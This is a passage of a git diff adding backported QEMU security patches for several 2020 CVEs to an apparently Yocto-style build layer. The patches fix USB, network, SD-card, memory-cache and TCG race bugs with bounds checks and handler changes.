++static void tz_ppc_dummy_write(void *opaque, hwaddr addr,
++                                        uint64_t data, unsigned size)
++{
++    g_assert_not_reached();
++}
++
+ static const MemoryRegionOps tz_ppc_dummy_ops = {
++    /* define r/w methods to avoid assert failure in memory_region_init_io */
++    .read = tz_ppc_dummy_read,
++    .write = tz_ppc_dummy_write,
+     .valid.accepts = tz_ppc_dummy_accepts,
+ };
+ 
+-- 
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-8.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-8.patch
new file mode 100644
index 0000000000..7857ba266e
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-8.patch
@@ -0,0 +1,44 @@
+From 735754aaa15a6ed46db51fd731e88331c446ea54 Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 11 Aug 2020 17:11:32 +0530
+Subject: [PATCH] imx7-ccm: add digprog mmio write method
+
+Add digprog mmio write method to avoid assert failure during
+initialisation.
+
+Reviewed-by: Li Qiang <liq3ea@gmail.com>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Message-Id: <20200811114133.672647-9-ppandit@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+CVE: CVE-2020-15469
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-15469-8.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/735754aaa15a6ed46db51fd731e88331c446ea54]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/misc/imx7_ccm.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+diff --git a/hw/misc/imx7_ccm.c b/hw/misc/imx7_ccm.c
+index 02fc1ae..075159e 100644
+--- a/hw/misc/imx7_ccm.c
++++ b/hw/misc/imx7_ccm.c
+@@ -131,8 +131,16 @@ static const struct MemoryRegionOps imx7_set_clr_tog_ops = {
+     },
+ };
+ 
++static void imx7_digprog_write(void *opaque, hwaddr addr,
++                                        uint64_t data, unsigned size)
++{
++    qemu_log_mask(LOG_GUEST_ERROR,
++                  "Guest write to read-only ANALOG_DIGPROG register\n");
++}
++
+ static const struct MemoryRegionOps imx7_digprog_ops = {
+     .read = imx7_set_clr_tog_read,
++    .write = imx7_digprog_write,
+     .endianness = DEVICE_NATIVE_ENDIAN,
+     .impl = {
+         .min_access_size = 4,
+-- 
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15859.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15859.patch
new file mode 100644
index 0000000000..0f43adeea8
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15859.patch
@@ -0,0 +1,39 @@
+From 22dc8663d9fc7baa22100544c600b6285a63c7a3 Mon Sep 17 00:00:00 2001
+From: Jason Wang <jasowang@redhat.com>
+Date: Wed, 22 Jul 2020 16:57:46 +0800
+Subject: [PATCH] net: forbid the reentrant RX
+
+The memory API allows DMA into NIC's MMIO area. This means the NIC's
+RX routine must be reentrant. Instead of auditing all the NIC, we can
+simply detect the reentrancy and return early. The queue->delivering
+is set and cleared by qemu_net_queue_deliver() for other queue helpers
+to know whether the delivering in on going (NIC's receive is being
+called). We can check it and return early in qemu_net_queue_flush() to
+forbid reentrant RX.
+
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+CVE: CVE-2020-15859
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/ubuntu/CVE-2020-15859.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/22dc8663d9fc7baa22100544c600b6285a63c7a3 ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ net/queue.c | 3 +++
+ 1 file changed, 3 insertions(+)
+
+diff --git a/net/queue.c b/net/queue.c
+index 0164727..19e32c8 100644
+--- a/net/queue.c
++++ b/net/queue.c
+@@ -250,6 +250,9 @@ void qemu_net_queue_purge(NetQueue *queue, NetClientState *from)
+ 
+ bool qemu_net_queue_flush(NetQueue *queue)
+ {
++    if (queue->delivering)
++        return false;
++
+     while (!QTAILQ_EMPTY(&queue->packets)) {
+         NetPacket *packet;
+         int ret;
+-- 
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-24165.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-24165.patch
new file mode 100644
index 0000000000..e0a27331a8
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-24165.patch
@@ -0,0 +1,94 @@
+CVE:  CVE-2020-24165
+Upstream-Status: Backport [https://github.com/qemu/qemu/commit/886cc68943ebe8cf7e5f970be33459f95068a441 ]
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+From 886cc68943ebe8cf7e5f970be33459f95068a441 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Alex=20Benn=C3=A9e?= <alex.bennee@linaro.org>
+Date: Fri, 14 Feb 2020 14:49:52 +0000
+Subject: [PATCH] accel/tcg: fix race in cpu_exec_step_atomic (bug 1863025)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The bug describes a race whereby cpu_exec_step_atomic can acquire a TB
+which is invalidated by a tb_flush before we execute it. This doesn't
+affect the other cpu_exec modes as a tb_flush by it's nature can only
+occur on a quiescent system. The race was described as:
+
+  B2. tcg_cpu_exec => cpu_exec => tb_find => tb_gen_code
+  B3. tcg_tb_alloc obtains a new TB
+
+      C3. TB obtained with tb_lookup__cpu_state or tb_gen_code
+          (same TB as B2)
+
+          A3. start_exclusive critical section entered
+          A4. do_tb_flush is called, TB memory freed/re-allocated
+          A5. end_exclusive exits critical section
+
+  B2. tcg_cpu_exec => cpu_exec => tb_find => tb_gen_code
+  B3. tcg_tb_alloc reallocates TB from B2
+
+      C4. start_exclusive critical section entered
+      C5. cpu_tb_exec executes the TB code that was free in A4
+
+The simplest fix is to widen the exclusive period to include the TB
+lookup. As a result we can drop the complication of checking we are in
+the exclusive region before we end it.
+
+Cc: Yifan <me@yifanlu.com>
+Buglink: https://bugs.launchpad.net/qemu/+bug/1863025
+Reviewed-by: Paolo Bonzini <pbonzini@redhat.com>
+Reviewed-by: Richard Henderson <richard.henderson@linaro.org>
+Signed-off-by: Alex Bennée <alex.bennee@linaro.org>
+Message-Id: <20200214144952.15502-1-alex.bennee@linaro.org>
+Signed-off-by: Richard Henderson <richard.henderson@linaro.org>
+---
+ accel/tcg/cpu-exec.c | 21 +++++++++++----------
+ 1 file changed, 11 insertions(+), 10 deletions(-)
+
+diff --git a/accel/tcg/cpu-exec.c b/accel/tcg/cpu-exec.c
+index 2560c90eec79..d95c4848a47b 100644
+--- a/accel/tcg/cpu-exec.c
++++ b/accel/tcg/cpu-exec.c
+@@ -240,6 +240,8 @@ void cpu_exec_step_atomic(CPUState *cpu)
+     uint32_t cf_mask = cflags & CF_HASH_MASK;
+ 
+     if (sigsetjmp(cpu->jmp_env, 0) == 0) {
++        start_exclusive();
++
+         tb = tb_lookup__cpu_state(cpu, &pc, &cs_base, &flags, cf_mask);
+         if (tb == NULL) {
+             mmap_lock();
+@@ -247,8 +249,6 @@ void cpu_exec_step_atomic(CPUState *cpu)
+             mmap_unlock();
+         }
+ 
+-        start_exclusive();
+-
+         /* Since we got here, we know that parallel_cpus must be true.  */
+         parallel_cpus = false;
+         cc->cpu_exec_enter(cpu);
+@@ -271,14 +271,15 @@ void cpu_exec_step_atomic(CPUState *cpu)
+         qemu_plugin_disable_mem_helpers(cpu);
+     }
+ 
+-    if (cpu_in_exclusive_context(cpu)) {
+-        /* We might longjump out of either the codegen or the
+-         * execution, so must make sure we only end the exclusive
+-         * region if we started it.
+-         */
+-        parallel_cpus = true;
+-        end_exclusive();
+-    }
++
++    /*
++     * As we start the exclusive region before codegen we must still
++     * be in the region if we longjump out of either the codegen or
++     * the execution.
++     */
++    g_assert(cpu_in_exclusive_context(cpu));
++    parallel_cpus = true;
++    end_exclusive();
+ }
+ 
+ struct tb_desc {
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-25085.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-25085.patch
new file mode 100644
index 0000000000..be19256cef
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-25085.patch
@@ -0,0 +1,46 @@
+From dfba99f17feb6d4a129da19d38df1bcd8579d1c3 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Philippe=20Mathieu-Daud=C3=A9?= <f4bug@amsat.org>
+Date: Tue, 1 Sep 2020 15:22:06 +0200
+Subject: [PATCH] hw/sd/sdhci: Fix DMA Transfer Block Size field
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The 'Transfer Block Size' field is 12-bit wide.
+
+See section '2.2.2. Block Size Register (Offset 004h)' in datasheet.
+
+Two different bug reproducer available:
+- https://bugs.launchpad.net/qemu/+bug/1892960
+- https://ruhr-uni-bochum.sciebo.de/s/NNWP2GfwzYKeKwE?path=%2Fsdhci_oob_write1
+
+Cc: qemu-stable@nongnu.org
+Buglink: https://bugs.launchpad.net/qemu/+bug/1892960
+Fixes: d7dfca0807a ("hw/sdhci: introduce standard SD host controller")
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Reviewed-by: Prasad J Pandit <pjp@fedoraproject.org>
+Tested-by: Alexander Bulekov <alxndr@bu.edu>
+Message-Id: <20200901140411.112150-3-f4bug@amsat.org>
+
+Upstream-Status: Backport
+CVE: CVE-2020-25085
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/sd/sdhci.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+Index: qemu-4.2.0/hw/sd/sdhci.c
+===================================================================
+--- qemu-4.2.0.orig/hw/sd/sdhci.c
++++ qemu-4.2.0/hw/sd/sdhci.c
+@@ -1129,7 +1129,7 @@ sdhci_write(void *opaque, hwaddr offset,
+         break;
+     case SDHC_BLKSIZE:
+         if (!TRANSFERRING_DATA(s->prnsts)) {
+-            MASKED_WRITE(s->blksize, mask, value);
++            MASKED_WRITE(s->blksize, mask, extract32(value, 0, 12));
+             MASKED_WRITE(s->blkcnt, mask >> 16, value >> 16);
+         }
+ 
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_1.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_1.patch
new file mode 100644
index 0000000000..a46b5be193
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_1.patch
@@ -0,0 +1,87 @@
+From fbec359e9279ce78908b9f2af2c264e7448336af Mon Sep 17 00:00:00 2001
+From: Guenter Roeck <linux@roeck-us.net>
+Date: Mon, 17 Feb 2020 12:48:10 -0800
+Subject: [PATCH] hw: usb: hcd-ohci: Move OHCISysBusState and TYPE_SYSBUS_OHCI
+ to include file
+
+We need to be able to use OHCISysBusState outside hcd-ohci.c, so move it
+to its include file.
+
+Reviewed-by: Gerd Hoffmann <kraxel@redhat.com>
+Signed-off-by: Guenter Roeck <linux@roeck-us.net>
+Tested-by: Niek Linnenbank <nieklinnenbank@gmail.com>
+Message-id: 20200217204812.9857-2-linux@roeck-us.net
+Signed-off-by: Peter Maydell <peter.maydell@linaro.org>
+
+Upstream-Status: Backport
+CVE: CVE-2020-25624 patch #1
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/usb/hcd-ohci.c | 15 ---------------
+ hw/usb/hcd-ohci.h | 16 ++++++++++++++++
+ 2 files changed, 16 insertions(+), 15 deletions(-)
+
+diff --git a/hw/usb/hcd-ohci.c b/hw/usb/hcd-ohci.c
+index 8a94bd004a..1e6e85e86a 100644
+--- a/hw/usb/hcd-ohci.c
++++ b/hw/usb/hcd-ohci.c
+@@ -1870,21 +1870,6 @@ void ohci_sysbus_die(struct OHCIState *ohci)
+     ohci_bus_stop(ohci);
+ }
+ 
+-#define TYPE_SYSBUS_OHCI "sysbus-ohci"
+-#define SYSBUS_OHCI(obj) OBJECT_CHECK(OHCISysBusState, (obj), TYPE_SYSBUS_OHCI)
+-
+-typedef struct {
+-    /*< private >*/
+-    SysBusDevice parent_obj;
+-    /*< public >*/
+-
+-    OHCIState ohci;
+-    char *masterbus;
+-    uint32_t num_ports;
+-    uint32_t firstport;
+-    dma_addr_t dma_offset;
+-} OHCISysBusState;
+-
+ static void ohci_realize_pxa(DeviceState *dev, Error **errp)
+ {
+     OHCISysBusState *s = SYSBUS_OHCI(dev);
+diff --git a/hw/usb/hcd-ohci.h b/hw/usb/hcd-ohci.h
+index 16e3f1e13a..5c8819aedf 100644
+--- a/hw/usb/hcd-ohci.h
++++ b/hw/usb/hcd-ohci.h
+@@ -22,6 +22,7 @@
+ #define HCD_OHCI_H
+ 
+ #include "sysemu/dma.h"
++#include "hw/usb.h"
+ 
+ /* Number of Downstream Ports on the root hub: */
+ #define OHCI_MAX_PORTS 15
+@@ -90,6 +91,21 @@ typedef struct OHCIState {
+     void (*ohci_die)(struct OHCIState *ohci);
+ } OHCIState;
+ 
++#define TYPE_SYSBUS_OHCI "sysbus-ohci"
++#define SYSBUS_OHCI(obj) OBJECT_CHECK(OHCISysBusState, (obj), TYPE_SYSBUS_OHCI)
++
++typedef struct {
++    /*< private >*/
++    SysBusDevice parent_obj;
++    /*< public >*/
++
++    OHCIState ohci;
++    char *masterbus;
++    uint32_t num_ports;
++    uint32_t firstport;
++    dma_addr_t dma_offset;
++} OHCISysBusState;
++
+ extern const VMStateDescription vmstate_ohci_state;
+ 
+ void usb_ohci_init(OHCIState *ohci, DeviceState *dev, uint32_t num_ports,
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_2.patch
new file mode 100644
index 0000000000..8c1275b2f4
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_2.patch
@@ -0,0 +1,101 @@
+From 1328fe0c32d5474604105b8105310e944976b058 Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 15 Sep 2020 23:52:58 +0530
+Subject: [PATCH] hw: usb: hcd-ohci: check len and frame_number variables
+
+While servicing the OHCI transfer descriptors(TD), OHCI host
+controller derives variables 'start_addr', 'end_addr', 'len'
+etc. from values supplied by the host controller driver.
+Host controller driver may supply values such that using
+above variables leads to out-of-bounds access issues.
+Add checks to avoid them.
+
+AddressSanitizer: stack-buffer-overflow on address 0x7ffd53af76a0
+  READ of size 2 at 0x7ffd53af76a0 thread T0
+  #0 ohci_service_iso_td ../hw/usb/hcd-ohci.c:734
+  #1 ohci_service_ed_list ../hw/usb/hcd-ohci.c:1180
+  #2 ohci_process_lists ../hw/usb/hcd-ohci.c:1214
+  #3 ohci_frame_boundary ../hw/usb/hcd-ohci.c:1257
+  #4 timerlist_run_timers ../util/qemu-timer.c:572
+  #5 qemu_clock_run_timers ../util/qemu-timer.c:586
+  #6 qemu_clock_run_all_timers ../util/qemu-timer.c:672
+  #7 main_loop_wait ../util/main-loop.c:527
+  #8 qemu_main_loop ../softmmu/vl.c:1676
+  #9 main ../softmmu/main.c:50
+
+Reported-by: Gaoning Pan <pgn@zju.edu.cn>
+Reported-by: Yongkang Jia <j_kangel@163.com>
+Reported-by: Yi Ren <yunye.ry@alibaba-inc.com>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Message-id: 20200915182259.68522-2-ppandit@redhat.com
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2020-25624 patch #2
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/usb/hcd-ohci.c | 24 ++++++++++++++++++++++--
+ 1 file changed, 22 insertions(+), 2 deletions(-)
+
+diff --git a/hw/usb/hcd-ohci.c b/hw/usb/hcd-ohci.c
+index 1e6e85e86a..9dc59101f9 100644
+--- a/hw/usb/hcd-ohci.c
++++ b/hw/usb/hcd-ohci.c
+@@ -731,7 +731,11 @@ static int ohci_service_iso_td(OHCIState *ohci, struct ohci_ed *ed,
+     }
+ 
+     start_offset = iso_td.offset[relative_frame_number];
+-    next_offset = iso_td.offset[relative_frame_number + 1];
++    if (relative_frame_number < frame_count) {
++        next_offset = iso_td.offset[relative_frame_number + 1];
++    } else {
++        next_offset = iso_td.be;
++    }
+ 
+     if (!(OHCI_BM(start_offset, TD_PSW_CC) & 0xe) || 
+         ((relative_frame_number < frame_count) && 
+@@ -764,7 +768,12 @@ static int ohci_service_iso_td(OHCIState *ohci, struct ohci_ed *ed,
+         }
+     } else {
+         /* Last packet in the ISO TD */
+-        end_addr = iso_td.be;
++        end_addr = next_offset;
++    }
++
++    if (start_addr > end_addr) {
++        trace_usb_ohci_iso_td_bad_cc_overrun(start_addr, end_addr);
++        return 1;
+     }
+ 
+     if ((start_addr & OHCI_PAGE_MASK) != (end_addr & OHCI_PAGE_MASK)) {
+@@ -773,6 +782,9 @@ static int ohci_service_iso_td(OHCIState *ohci, struct ohci_ed *ed,
+     } else {
+         len = end_addr - start_addr + 1;
+     }
++    if (len > sizeof(ohci->usb_buf)) {
++        len = sizeof(ohci->usb_buf);
++    }
+ 
+     if (len && dir != OHCI_TD_DIR_IN) {
+         if (ohci_copy_iso_td(ohci, start_addr, end_addr, ohci->usb_buf, len,
+@@ -975,8 +987,16 @@ static int ohci_service_td(OHCIState *ohci, struct ohci_ed *ed)
+         if ((td.cbp & 0xfffff000) != (td.be & 0xfffff000)) {
+             len = (td.be & 0xfff) + 0x1001 - (td.cbp & 0xfff);
+         } else {
++            if (td.cbp > td.be) {
++                trace_usb_ohci_iso_td_bad_cc_overrun(td.cbp, td.be);
++                ohci_die(ohci);
++                return 1;
++            }
+             len = (td.be - td.cbp) + 1;
+         }
++        if (len > sizeof(ohci->usb_buf)) {
++            len = sizeof(ohci->usb_buf);
++        }
+ 
+         pktlen = len;
+         if (len && dir != OHCI_TD_DIR_IN) {
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-25625.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-25625.patch
new file mode 100644
index 0000000000..374d7c4562
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-25625.patch
@@ -0,0 +1,42 @@
+From 1be90ebecc95b09a2ee5af3f60c412b45a766c4f Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 15 Sep 2020 23:52:59 +0530
+Subject: [PATCH] hw: usb: hcd-ohci: check for processed TD before retire
+
+While servicing OHCI transfer descriptors(TD), ohci_service_iso_td
+retires a TD if it has passed its time frame. It does not check if
+the TD was already processed once and holds an error code in TD_CC.
+It may happen if the TD list has a loop. Add check to avoid an
+infinite loop condition.
+
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Reviewed-by: Li Qiang <liq3ea@gmail.com>
+Message-id: 20200915182259.68522-3-ppandit@redhat.com
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2020-25625
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/usb/hcd-ohci.c | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+diff --git a/hw/usb/hcd-ohci.c b/hw/usb/hcd-ohci.c
+index 9dc59101f9..8b912e95d3 100644
+--- a/hw/usb/hcd-ohci.c
++++ b/hw/usb/hcd-ohci.c
+@@ -691,6 +691,10 @@ static int ohci_service_iso_td(OHCIState *ohci, struct ohci_ed *ed,
+            the next ISO TD of the same ED */
+         trace_usb_ohci_iso_td_relative_frame_number_big(relative_frame_number,
+                                                         frame_count);
++        if (OHCI_CC_DATAOVERRUN == OHCI_BM(iso_td.flags, TD_CC)) {
++            /* avoid infinite loop */
++            return 1;
++        }
+         OHCI_SET_BM(iso_td.flags, TD_CC, OHCI_CC_DATAOVERRUN);
+         ed->head &= ~OHCI_DPTR_MASK;
+         ed->head |= (iso_td.next & OHCI_DPTR_MASK);
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-25723.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-25723.patch
new file mode 100644
index 0000000000..e6e0f5ec30
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-25723.patch
@@ -0,0 +1,52 @@
+From 2fdb42d840400d58f2e706ecca82c142b97bcbd6 Mon Sep 17 00:00:00 2001
+From: Li Qiang <liq3ea@163.com>
+Date: Wed, 12 Aug 2020 09:17:27 -0700
+Subject: [PATCH] hw: ehci: check return value of 'usb_packet_map'
+
+If 'usb_packet_map' fails, we should stop to process the usb
+request.
+
+Signed-off-by: Li Qiang <liq3ea@163.com>
+Message-Id: <20200812161727.29412-1-liq3ea@163.com>
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+
+Upstream-Status: Backport [https://git.qemu.org/?p=qemu.git;a=commit;h=2fdb42d840400d58f2e706ecca82c142b97bcbd6]
+CVE: CVE-2020-25723
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ hw/usb/hcd-ehci.c | 10 ++++++++--
+ 1 file changed, 8 insertions(+), 2 deletions(-)
+
+diff --git a/hw/usb/hcd-ehci.c b/hw/usb/hcd-ehci.c
+index 58cceac..4da446d 100644
+--- a/hw/usb/hcd-ehci.c
++++ b/hw/usb/hcd-ehci.c
+@@ -1373,7 +1373,10 @@ static int ehci_execute(EHCIPacket *p, const char *action)
+         spd = (p->pid == USB_TOKEN_IN && NLPTR_TBIT(p->qtd.altnext) == 0);
+         usb_packet_setup(&p->packet, p->pid, ep, 0, p->qtdaddr, spd,
+                          (p->qtd.token & QTD_TOKEN_IOC) != 0);
+-        usb_packet_map(&p->packet, &p->sgl);
++        if (usb_packet_map(&p->packet, &p->sgl)) {
++            qemu_sglist_destroy(&p->sgl);
++            return -1;
++        }
+         p->async = EHCI_ASYNC_INITIALIZED;
+     }
+ 
+@@ -1453,7 +1456,10 @@ static int ehci_process_itd(EHCIState *ehci,
+             if (ep && ep->type == USB_ENDPOINT_XFER_ISOC) {
+                 usb_packet_setup(&ehci->ipacket, pid, ep, 0, addr, false,
+                                  (itd->transact[i] & ITD_XACT_IOC) != 0);
+-                usb_packet_map(&ehci->ipacket, &ehci->isgl);
++                if (usb_packet_map(&ehci->ipacket, &ehci->isgl)) {
++                    qemu_sglist_destroy(&ehci->isgl);
++                    return -1;
++                }
+                 usb_handle_packet(dev, &ehci->ipacket);
+                 usb_packet_unmap(&ehci->ipacket, &ehci->isgl);
+             } else {
+-- 
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-27617.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-27617.patch
new file mode 100644
index 0000000000..7bfc2beecb
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-27617.patch
@@ -0,0 +1,49 @@
+From 7564bf7701f00214cdc8a678a9f7df765244def1 Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Wed, 21 Oct 2020 11:35:50 +0530
+Subject: [PATCH] net: remove an assert call in eth_get_gso_type
+
+eth_get_gso_type() routine returns segmentation offload type based on
+L3 protocol type. It calls g_assert_not_reached if L3 protocol is
+unknown, making the following return statement unreachable. Remove the
+g_assert call, it maybe triggered by a guest user.
+
+Reported-by: Gaoning Pan <pgn@zju.edu.cn>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upsteram-Status: Backport
+CVE: CVE-2020-27617
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ net/eth.c | 6 +++---
+ 1 file changed, 3 insertions(+), 3 deletions(-)
+
+diff --git a/net/eth.c b/net/eth.c
+index 0c1d413ee2..1e0821c5f8 100644
+--- a/net/eth.c
++++ b/net/eth.c
+@@ -16,6 +16,7 @@
+  */
+ 
+ #include "qemu/osdep.h"
++#include "qemu/log.h"
+ #include "net/eth.h"
+ #include "net/checksum.h"
+ #include "net/tap.h"
+@@ -71,9 +72,8 @@ eth_get_gso_type(uint16_t l3_proto, uint8_t *l3_hdr, uint8_t l4proto)
+             return VIRTIO_NET_HDR_GSO_TCPV6 | ecn_state;
+         }
+     }
+-
+-    /* Unsupported offload */
+-    g_assert_not_reached();
++    qemu_log_mask(LOG_UNIMP, "%s: probably not GSO frame, "
++        "unknown L3 protocol: 0x%04"PRIx16"\n", __func__, l3_proto);
+ 
+     return VIRTIO_NET_HDR_GSO_NONE | ecn_state;
+ }
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-27821.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-27821.patch
new file mode 100644
index 0000000000..e26bc31bbb
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-27821.patch
@@ -0,0 +1,73 @@
+From 15222d4636d742f3395fd211fad0cd7e36d9f43e Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Tue, 16 Aug 2022 10:07:01 +0530
+Subject: [PATCH] CVE-2020-27821
+
+Upstream-Status: Backport [https://git.qemu.org/?p=qemu.git;a=commit;h=4bfb024bc76973d40a359476dc0291f46e435442]
+CVE: CVE-2020-27821
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+memory: clamp cached translation in case it points to an MMIO region
+
+In using the address_space_translate_internal API, address_space_cache_init
+forgot one piece of advice that can be found in the code for
+address_space_translate_internal:
+
+    /* MMIO registers can be expected to perform full-width accesses based only
+     * on their address, without considering adjacent registers that could
+     * decode to completely different MemoryRegions.  When such registers
+     * exist (e.g. I/O ports 0xcf8 and 0xcf9 on most PC chipsets), MMIO
+     * regions overlap wildly.  For this reason we cannot clamp the accesses
+     * here.
+     *
+     * If the length is small (as is the case for address_space_ldl/stl),
+     * everything works fine.  If the incoming length is large, however,
+     * the caller really has to do the clamping through memory_access_size.
+     */
+
+address_space_cache_init is exactly one such case where "the incoming length
+is large", therefore we need to clamp the resulting length---not to
+memory_access_size though, since we are not doing an access yet, but to
+the size of the resulting section.  This ensures that subsequent accesses
+to the cached MemoryRegionSection will be in range.
+
+With this patch, the enclosed testcase notices that the used ring does
+not fit into the MSI-X table and prints a "qemu-system-x86_64: Cannot map used"
+error.
+
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+---
+ exec.c | 10 ++++++++++
+ 1 file changed, 10 insertions(+)
+
+diff --git a/exec.c b/exec.c
+index 2d6add46..1360051a 100644
+--- a/exec.c
++++ b/exec.c
+@@ -3632,6 +3632,7 @@ int64_t address_space_cache_init(MemoryRegionCache *cache,
+     AddressSpaceDispatch *d;
+     hwaddr l;
+     MemoryRegion *mr;
++    Int128 diff;
+ 
+     assert(len > 0);
+ 
+@@ -3640,6 +3641,15 @@ int64_t address_space_cache_init(MemoryRegionCache *cache,
+     d = flatview_to_dispatch(cache->fv);
+     cache->mrs = *address_space_translate_internal(d, addr, &cache->xlat, &l, true);
+ 
++    /*
++     * cache->xlat is now relative to cache->mrs.mr, not to the section itself.
++     * Take that into account to compute how many bytes are there between
++     * cache->xlat and the end of the section.
++     */
++    diff = int128_sub(cache->mrs.size,
++                     int128_make64(cache->xlat - cache->mrs.offset_within_region));
++    l = int128_get64(int128_min(diff, int128_make64(l)));
++
+     mr = cache->mrs.mr;
+     memory_region_ref(mr);
+     if (memory_access_is_direct(mr, is_write)) {
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-28916.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-28916.patch
new file mode 100644
index 0000000000..756b1c1495
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-28916.patch
@@ -0,0 +1,48 @@
+From c2cb511634012344e3d0fe49a037a33b12d8a98a Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Wed, 11 Nov 2020 18:36:36 +0530
+Subject: [PATCH] hw/net/e1000e: advance desc_offset in case of null descriptor
+
+While receiving packets via e1000e_write_packet_to_guest() routine,
+'desc_offset' is advanced only when RX descriptor is processed. And
+RX descriptor is not processed if it has NULL buffer address.
+This may lead to an infinite loop condition. Increament 'desc_offset'
+to process next descriptor in the ring to avoid infinite loop.
+
+Reported-by: Cheol-woo Myung <330cjfdn@gmail.com>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2020-28916
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/net/e1000e_core.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/hw/net/e1000e_core.c b/hw/net/e1000e_core.c
+index d8b9e4b2f4..095c01ebc6 100644
+--- a/hw/net/e1000e_core.c
++++ b/hw/net/e1000e_core.c
+@@ -1596,13 +1596,13 @@ e1000e_write_packet_to_guest(E1000ECore *core, struct NetRxPkt *pkt,
+                           (const char *) &fcs_pad, e1000x_fcs_len(core->mac));
+                 }
+             }
+-            desc_offset += desc_size;
+-            if (desc_offset >= total_size) {
+-                is_last = true;
+-            }
